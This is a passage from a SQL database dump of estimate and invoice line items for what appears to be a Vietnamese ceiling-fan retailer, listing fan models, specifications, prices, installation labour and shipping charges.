(1121, 232, 'estimate', 'Bộ điều khiển AC gắn tường vuông 3 tốc độ Tổ chức đào tạo WIT', '', 18.00, 350000.00, 'Cái', 1, 0, '', 0.00),
(1123, 233, 'estimate', 'Quạt trần 5 cánh gỗ ABACUS 60 Matt White Wood', 'Sải cánh 152cm ( ~ 60inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện)  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)  <br />\r\nTuỳ chọn đèn: N/A (không có)', 3.00, 6800000.00, 'Cái', 1, 25, '', 0.00),
(1124, 233, 'estimate', 'Ống ty treo quạt trần', 'Ống ty treo quạt trần nhà ở, chung cư<br />\r\nĐộ dài: 2m', 3.00, 350000.00, 'cây', 2, 0, '', 0.00),
(1125, 233, 'estimate', 'Chi phí vận chuyển', 'Vận chuyển xe tải tới Thanh Hoá. <br />\r\nNhận tại chành xe Phương Trang hoặc chành xe người nhận yêu cầu.', 1.00, 550000.00, 'lô', 3, 0, '', 0.00),
(1126, 234, 'estimate', 'Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut', 'Model: DCF-FS52930-60 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm', 3.00, 8400000.00, '', 1, 30, '', 0.00),
(1127, 234, 'estimate', 'Ống ty treo quạt trần', 'Ống ty treo quạt trần nhà ở, chung cư<br />\r\nĐộ dài ống ty: 2m (ống thép sơn đen tĩnh điện)', 3.00, 350000.00, 'cây', 2, 0, '', 0.00),
(1128, 234, 'estimate', 'Chi phí vận chuyển', 'Vận chuyển xe tải tới chân công trình', 1.00, 550000.00, 'lô', 3, 0, '', 0.00),
(1129, 349, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut', 'Model: DCF-FS52930-60 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm', 3.00, 8400000.00, '', 1, 0, NULL, 0.00),
(1130, 349, 'invoice', 'Ống ty treo quạt trần', 'Ống ty treo quạt trần nhà ở, chung cư<br />\r\nĐộ dài ống ty: 2m (ống thép sơn đen tĩnh điện)', 3.00, 350000.00, 'cây', 2, 0, NULL, 0.00),
(1131, 349, 'invoice', 'Chi phí vận chuyển', 'Vận chuyển xe tải tới chân công trình', 1.00, 550000.00, 'lô', 3, 0, NULL, 0.00),
(1135, 235, 'estimate', 'Quạt trần SINO LED 52 Black Dark Wood', 'Sải cánh 132cm ( ~ 52inch)     <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     <br />\r\nMàu thân quạt: Matt Black(Đen sơn tĩnh điện)     <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)     <br />\r\nĐèn LED: không đèn  <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm', 1.00, 6300000.00, 'cái', 1, 30, '', 0.00),
(1136, 230, 'estimate', 'Chi phí sơn 3 cánh quạt sang màu sẫm', '', 1.00, 850000.00, 'lô', 2, 0, '', 0.00),
(1137, 350, 'invoice', 'Quạt trần 3 cánh gỗ AKMANI 52 BN Maple Wood', 'Sải cánh 132cm   <br />\r\nMàu Cánh Quạt: Timber Wood (màu vân gỗ tự nhiên)   <br />\r\nMàu thân Quạt: Matte Black (sơn tĩnh điện màu Đen)   <br />\r\nSải Cánh Quạt: 1m32 ~ 52 inchs   <br />\r\nĐiều Khiển: Từ xa 5 cấp độ - đi kèm   <br />\r\nAirflow (M3/Min): 6823 CFM   <br />\r\nTốc Độ Quay: 5-6 cấp độ gió   <br />\r\nNhà Sản Xuất/Xuất Xứ:  Tổ chức đào tạo WIT/ China   <br />\r\nTiêu Chuẩn Động Cơ: động cơ DC tiêu chuẩn BLDC (tiết kiệm 70% điện năng)', 1.00, 5800000.00, '', 1, 30, NULL, 0.00),
(1138, 350, 'invoice', 'Chi phí sơn 3 cánh quạt sang màu sẫm', '', 1.00, 850000.00, 'lô', 2, 0, NULL, 0.00),
(1139, 351, 'invoice', 'Haiku I 60 inch Black with SenseME', 'Model:  <br />\r\nSải cánh: 150cm (60 inch), Universal<br />\r\nThân màu: Đen <br />\r\nMàu cánh: Đen<br />\r\nchất liệu nhựa Composite có độ bền cao  <br />\r\nThiết kế tích hợp SenseME - cảm biến nhiệt, độ ẩm, cảm biến chuyển động hồng ngoại. (Made in USA)  <br />\r\nĐiều khiển 7 tốc độ đi kèm  <br />\r\nBộ đèn: Chưa bao gồm  <br />\r\nThương hiệu: Haiku/USA', 1.00, 39000000.00, '', 1, 20, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1140, 352, 'invoice', 'Bộ điều khiển DC 6 tốc độ', '', 1.00, 750000.00, 'sets', 1, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1141, 353, 'invoice', 'Bộ điều khiển DC 6 tốc độ', '', 1.00, 750000.00, 'sets', 1, 0, NULL, 0.00),
(1142, 236, 'estimate', 'Bộ điều khiển DC 5 tốc độ Tổ chức đào tạo WIT', '', 1.00, 750000.00, '', 1, 0, '', 0.00),
(1143, 236, 'estimate', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần, quạt cây, quạt đứng, quạt treo tường...     <br />\r\nCông việc:     <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 1.00, 400000.00, 'cái', 2, 0, '', 0.00),
(1144, 237, 'estimate', 'Quạt trần 3 cánh gỗ AKMANI 52 White Maple Wood (màu gỗ sáng)', 'Đường kính cánh: 132cm   <br />\r\nĐộng cơ: BLDC motor, công suất 35W   <br />\r\nBộ điều khiển từ xa  <br />\r\nMàu sắc cánh: Maple Wood  <br />\r\nMàu sắc thân quạt: White', 3.00, 4000000.00, 'sets', 1, 0, '', 0.00);
INSERT INTO `tblitemable` (`id`, `rel_id`, `rel_type`, `description`, `long_description`, `qty`, `rate`, `unit`, `item_order`, `discount`, `item_image`, `wh_delivered_quantity`) VALUES
(1145, 238, 'estimate', 'Haiku 60 inch Cocoa Bamboo', 'Sải cánh 152cm (60 inch)        <br />\r\nMàu cánh: Cocoa Bamboo      <br />\r\nMàu thân : Universal Black        <br />\r\nĐộng cơ EC, công suất 29.3W        <br />\r\nĐiều khiển từ xa 7 tốc độ đi kèm        <br />\r\nTích hợp sẳn bộ cảm biến SenseME (điều khiển APP, cảm biến chuyển động...)        <br />\r\nBộ đèn LED tuỳ chọn thêm        <br />\r\nThương hiệu: Haiku/USA ', 2.00, 47200000.00, 'cái', 1, 20, '', 0.00),
(1146, 354, 'invoice', 'Bộ điều khiển DC 6 tốc độ Mountair Air', '', 1.00, 750000.00, '', 1, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1147, 355, 'invoice', 'Quạt trần 5 cánh gỗ ABACUS 60 Matt White Wood', 'Sải cánh 152cm ( ~ 60inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện)  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)  <br />\r\nTuỳ chọn đèn: N/A (không có)', 1.00, 6800000.00, 'Cái', 1, 25, 'https://hgphome.com/uploads/items/1942/thumb_abacus-crm_img.jpg', 0.00),
(1148, 355, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Gia cố móc treo - trần tấm thạch cao &lt; 50cm', 1.00, 500000.00, 'cái', 2, 0, 'https://hgphome.com/uploads/items/1924/thumb_thumb_lap_dat-1.jpg', 0.00),
(1149, 356, 'invoice', 'Bộ điều khiển AC 3 tốc độ Tổ chức đào tạo WIT', '', 1.00, 550000.00, '', 1, 0, 'https://hgphome.com/uploads/items/1796/thumb_dieu-khien-3-cap-ac-.jpg', 0.00),
(1150, 356, 'invoice', 'Bảo dưỡng, sửa chữa quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần, quạt cây, quạt đứng, quạt treo tường...     <br />\r\nCông việc:     <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 1.00, 350000.00, 'cái', 2, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1151, 357, 'invoice', 'Bộ điều khiển DC 5 tốc độ Tổ chức đào tạo WIT', '', 1.00, 750000.00, '', 1, 0, NULL, 0.00),
(1152, 357, 'invoice', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần, quạt cây, quạt đứng, quạt treo tường...     <br />\r\nCông việc:     <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 1.00, 400000.00, 'cái', 2, 0, NULL, 0.00),
(1153, 239, 'estimate', 'Bộ điều khiển DC 5 tốc độ Tổ chức đào tạo WIT', '', 1.00, 750000.00, '', 1, 0, '', 0.00),
(1154, 239, 'estimate', 'Chi phí sửa chữa quạt', 'Chi phí nhân công + chi phí vật tư', 1.00, 1000000.00, 'cái', 2, 0, '', 0.00),
(1155, 358, 'invoice', 'Quạt trần 3 cánh gỗ AKMANI 52 White Maple Wood (màu gỗ sáng)', 'Đường kính cánh: 132cm   <br />\r\nĐộng cơ: BLDC motor, công suất 35W   <br />\r\nBộ điều khiển từ xa  <br />\r\nMàu sắc cánh: Maple Wood  <br />\r\nMàu sắc thân quạt: White', 3.00, 4000000.00, 'sets', 1, 0, NULL, 0.00),
(1159, 359, 'invoice', 'Quạt trần KATRINA 52 Gray Maple Wood', 'Sải cánh 132cm ( ~ 52inch)     <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)     <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)     <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)     <br />\r\nĐèn LED: 3 màu, 2700K - 3000K     <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm     <br />\r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China', 5.00, 4500000.00, 'cái', 1, 0, 'https://hgphome.com/uploads/items/1943/thumb_katrina_maple_wood.jpg', 0.00),
(1160, 240, 'estimate', 'Quạt trần 5 cánh gỗ ABACUS 60 BN Maple Wood', 'Sải cánh 152cm ( ~ 60inch)    <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W    <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)    <br />\r\nMàu thân quạt: Trắng  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)    <br />\r\nTuỳ chọn đèn: N/A (không có)', 1.00, 6800000.00, 'cái', 1, 25, '', 0.00),
(1161, 240, 'estimate', 'Nhân công lắp đặt quạt trần', '', 1.00, 500000.00, 'cái', 2, 0, '', 0.00),
(1162, 360, 'invoice', 'Quạt trần 5 cánh gỗ ABACUS 60 BN Maple Wood', 'Sải cánh 152cm ( ~ 60inch)    <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W    <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)    <br />\r\nMàu thân quạt: Trắng  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)    <br />\r\nTuỳ chọn đèn: N/A (không có)', 1.00, 6800000.00, 'cái', 1, 25, NULL, 0.00),
(1163, 360, 'invoice', 'Nhân công lắp đặt quạt trần', '', 1.00, 500000.00, 'cái', 2, 0, NULL, 0.00),
(1164, 241, 'estimate', 'Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut', 'Model: DCF-FS52930-60 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm ', 3.00, 8400000.00, '', 1, 0, '', 0.00),
(1165, 242, 'estimate', 'Bộ điều khiển DC 6 tốc độ Mountair Air', 'Dùng cho quạt SOANA - 7062 WHITE', 1.00, 750000.00, '', 1, 0, '', 0.00),
(1166, 242, 'estimate', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần, quạt cây, quạt đứng, quạt treo tường...     <br />\r\nCông việc:     <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 1.00, 350000.00, 'cái', 2, 0, '', 0.00),
(1167, 361, 'invoice', 'Bộ điều khiển DC 6 tốc độ Mountair Air', 'Dùng cho quạt SOANA - 7062 WHITE', 1.00, 750000.00, '', 1, 0, NULL, 0.00),
(1168, 361, 'invoice', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần, quạt cây, quạt đứng, quạt treo tường...     <br />\r\nCông việc:     <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 1.00, 350000.00, 'cái', 2, 0, NULL, 0.00),
(1169, 362, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut', 'Model: DCF-FS52930-60 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm', 3.00, 8400000.00, '', 1, 0, NULL, 0.00),
(1170, 363, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut', 'Model: NW 1902 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm ', 2.00, 4800000.00, '', 1, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1171, 363, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut', 'Model: NW1903 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm ', 2.00, 4800000.00, '', 2, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1172, 243, 'estimate', 'Cục nguồn điều khiển DC 6 tốc độ Mountair Air', '', 3.00, 550000.00, '', 1, 0, '', 0.00),
(1173, 364, 'invoice', 'Bộ điều khiển DC 5 tốc độ Tổ chức đào tạo WIT', 'Bảo hành', 1.00, 0.00, '', 1, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1174, 364, 'invoice', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần', 1.00, 350000.00, 'cái', 2, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1175, 365, 'invoice', 'Quạt trần 3 cánh gỗ AKMANI 52 White Maple Wood (màu gỗ sáng)', 'Đường kính cánh: 132cm   <br />\r\nĐộng cơ: BLDC motor, công suất 35W   <br />\r\nBộ điều khiển từ xa  <br />\r\nMàu sắc cánh: Maple Wood  <br />\r\nMàu sắc thân quạt: White', 1.00, 5800000.00, '', 1, 30, 'https://hgphome.com/uploads/items/1927/thumb_2akmani_.jpg', 0.00),
(1176, 365, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Lắp đặt trần chung cư', 1.00, 500000.00, 'cái', 2, 0, 'https://hgphome.com/uploads/items/1924/thumb_thumb_lap_dat-1.jpg', 0.00),
(1177, 366, 'invoice', 'Quạt trần cao cấp IRIS 60 White ABS', 'Quạt trần HVLS Modern IRIS 60   <br />\r\nSải cánh: 152cm   <br />\r\nĐộng cơ EC, công suất 55 W (max speed)   <br />\r\nĐiều khiển 6 tốc độ đi kèm   <br />\r\nThương hiệu: SUNON/Taiwan', 1.00, 15800000.00, 'cái', 1, 25, 'https://hgphome.com/uploads/items/1858/thumb_sunon-white-modern.jpg', 0.00),
(1178, 366, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Lắp đặt nguồn điện sẳn có  - Tháo quạt cũ (vị trí lắp đặt liên hệ để biết thêm)<br />\r\n- LẮP ĐẶT MIỄN PHI', 1.00, 0.00, 'cái', 2, 0, 'https://hgphome.com/uploads/items/1924/thumb_thumb_lap_dat-1.jpg', 0.00),
(1179, 367, 'invoice', 'Quạt trần cao cấp IRIS 60 White ABS', 'Quạt trần HVLS Modern IRIS 60   <br />\r\nSải cánh: 152cm   <br />\r\nĐộng cơ EC, công suất 55 W (max speed)   <br />\r\nĐiều khiển 6 tốc độ đi kèm   <br />\r\nThương hiệu: SUNON/Taiwan', 2.00, 15800000.00, 'cái', 1, 25, 'https://hgphome.com/uploads/items/1858/thumb_sunon-white-modern.jpg', 0.00),
(1180, 367, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 2.00, 0.00, 'cái', 2, 0, 'https://hgphome.com/uploads/items/1924/thumb_thumb_lap_dat-1.jpg', 0.00),
(1181, 368, 'invoice', 'Bộ điều khiển AC 3 tốc độ Tổ chức đào tạo WIT', '', 1.00, 550000.00, '', 1, 0, 'https://hgphome.com/uploads/items/1796/thumb_dieu-khien-3-cap-ac-.jpg', 0.00),
(1182, 368, 'invoice', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Thay bộ điều khiển, vệ sinh 2 quạt', 1.00, 450000.00, 'cái', 2, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1185, 369, 'invoice', 'Cục nguồn điều khiển DC 6 tốc độ Mountair Air', '', 3.00, 550000.00, '', 1, 0, NULL, 0.00),
(1186, 370, 'invoice', 'Quạt trần cánh lớn Powerful S1 sải cánh 2m5', 'Đường kính cánh: 8ft ft (2.4 m) <br />\r\nCánh quạt / Airfoils : 7 cánh. Chất liệu cánh: Aluminum <br />\r\nTốc độ quay tối đa / Max Speed: 95 RPM (max speed) <br />\r\nNguồn điện / Input Power: 220-240 VAC, 1Φ, 50/60 Hz <br />\r\nĐiều khiển / Control: Remote Control for Wall <br />\r\nĐộ ồn / Sound at Max Speed: &lt;35 dBA <br />\r\nTrọng lượng: 18 kg <br />\r\nDiện tích bao phủ mát / Max Affected Area: 1,722 ft2 / 160 m2 <br />\r\nLưu lượng luồng gió: 24,500 CFM (41,596 m3/h) <br />\r\n <br />\r\nCông suất động cơ / Power Consumption: 84 W (tiết kiệm điện 90% so với động cơ AC thường ở cùng sải cánh) <br />\r\nĐẶT ĐIỂM CHUNG - QUẠT TRẦN POWERFUL S1 <br />\r\nCánh quạt / Airfoils : 7 cánh. Chất liệu cánh: Aluminum <br />\r\nPhụ kiện an toàn kèm theo, bộ phụ kiện lắp cánh quạt đã bao gồm <br />\r\nTuỳ chọn: điều khiển Modbus quản lý tập trung BMS. Liên hệ nhà cung cấp tư vấn <br />\r\nThương hiệu: SUNON/ Taiwan (thiết kế sản xuất 100% Taiwan)', 1.00, 34800000.00, '', 1, 28, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1187, 370, 'invoice', 'Chi phí vận chuyển', 'Vận chuyển xe tải tới Hà Nội - giao hàng miễn phí', 1.00, 0.00, 'lô', 2, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1188, 370, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Thi công lắp đặt quạt trần 2,5m tại Hưng Yên - cách Hà Nội 30km<br />\r\nTiền lắp đặt 1000k<br />\r\nTiền đi lại 500k', 1.00, 1500000.00, 'cái', 3, 0, 'https://hgphome.com/uploads/items/1924/thumb_thumb_lap_dat-1.jpg', 0.00),
(1189, 244, 'estimate', 'Haiku 60 inch Cocoa Bamboo, Low Profile Black', 'Sải cánh 150cm (60 inch)        <br />\r\nMàu cánh: Cocoa Bamboo      <br />\r\nMàu thân : Universal Black        <br />\r\nĐộng cơ EC, công suất 29.3W        <br />\r\nĐiều khiển từ xa 7 tốc độ đi kèm        <br />\r\nTích hợp sẳn bộ cảm biến SenseME (điều khiển APP, cảm biến chuyển động...)        <br />\r\nBộ đèn LED tuỳ chọn thêm        <br />\r\nThương hiệu: Haiku/USA', 1.00, 47200000.00, 'cái', 1, 18, '', 0.00),
(1190, 244, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Lắp đặt tại Nguyễn Văn Hưởng - Quận 2 - khu ban công ngoài trời có mái che', 1.00, 500000.00, 'cái', 2, 0, '', 0.00),
(1192, 371, 'invoice', 'Quạt trần cổ điển MAREILLY 52 Black Wood Metal Blades', 'Sải cánh 132cm <br />\r\nĐộng cơ DC, 35W hoạt động Êm, tiết kiệm điện <br />\r\nĐiều khiển 6 tốc độ <br />\r\nThương hieuej: WildMill / Made in India (Ấn Độ) <br />\r\nThiết kế dựa trên nguyên bản Marelli (Ý) <br />\r\nMotor đúc nguyên khối nhôm, có độ bền tản nhiệt cao', 1.00, 13800000.00, '', 1, 0, 'https://hgphome.com/uploads/items/1819/thumb_mareilly-black.jpg', 0.00),
(1193, 371, 'invoice', 'Chi phí vận chuyển', '', 1.00, 395000.00, 'lô', 2, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1194, 245, 'estimate', 'Quạt trần cánh lớn Powerful S1 sải cánh 3m', 'Đường kính cánh: 10ft ft (3 m) <br />\r\nCánh quạt / Airfoils : 7 cánh. Chất liệu cánh: Aluminum <br />\r\nTốc độ quay tối đa / Max Speed: 70 RPM (max speed) <br />\r\nNguồn điện / Input Power: 220-240 VAC, 1Φ, 50/60 Hz <br />\r\nĐiều khiển / Control: Remote Control for Wall <br />\r\nĐộ ồn / Sound at Max Speed: &lt;35 dBA <br />\r\nTrọng lượng: 20 kg <br />\r\nDiện tích bao phủ mát / Max Affected Area: 1,722 ft2 / 160 m2 <br />\r\nLưu lượng luồng gió: 24,500 CFM (41,596 m3/h) <br />\r\n <br />\r\nCông suất động cơ / Power Consumption: 84 W (tiết kiệm điện 90% so với động cơ AC thường ở cùng sải cánh) <br />\r\nĐẶT ĐIỂM CHUNG - QUẠT TRẦN POWERFUL S1 <br />\r\nCánh quạt / Airfoils : 7 cánh. Chất liệu cánh: Aluminum <br />\r\nPhụ kiện an toàn kèm theo, bộ phụ kiện lắp cánh quạt đã bao gồm <br />\r\nTuỳ chọn: điều khiển Modbus quản lý tập trung BMS. Liên hệ nhà cung cấp tư vấn <br />\r\nThương hiệu: SUNON/ Taiwan (thiết kế sản xuất 100% Taiwan)', 2.00, 34800000.00, '', 1, 27, '', 0.00),
(1195, 245, 'estimate', 'Thi công lắp đặt đường dây điện cấp nguồn quạt', 'Cáp điện 1.5m2 CVV (cáp điện Cadivi)', 2.00, 1000000.00, 'cái', 2, 0, '', 0.00),
(1196, 245, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Thi công lắp đặt trần mái - khung sắt - độ cao 4,5m', 2.00, 1500000.00, 'cái', 3, 0, '', 0.00),
(1197, 372, 'invoice', 'Quạt trần 3 cánh gỗ AKMANI 52 White Maple Wood (màu gỗ sáng)', 'Đường kính cánh: 132cm   <br />\r\nĐộng cơ: BLDC motor, công suất 35W   <br />\r\nBộ điều khiển từ xa  <br />\r\nMàu sắc cánh: Maple Wood  <br />\r\nMàu sắc thân quạt: White<br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm', 1.00, 3900000.00, '', 1, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1198, 373, 'invoice', 'Bộ điều khiển DC 5 tốc độ Tổ chức đào tạo WIT', 'Điều khiển dành cho quạt AKMANI - 3 cánh gỗ', 1.00, 750000.00, '', 1, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1199, 374, 'invoice', 'Bảo dưỡng, sửa chữa lắp đặt quạt', '', 1.00, 350000.00, 'cái', 1, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
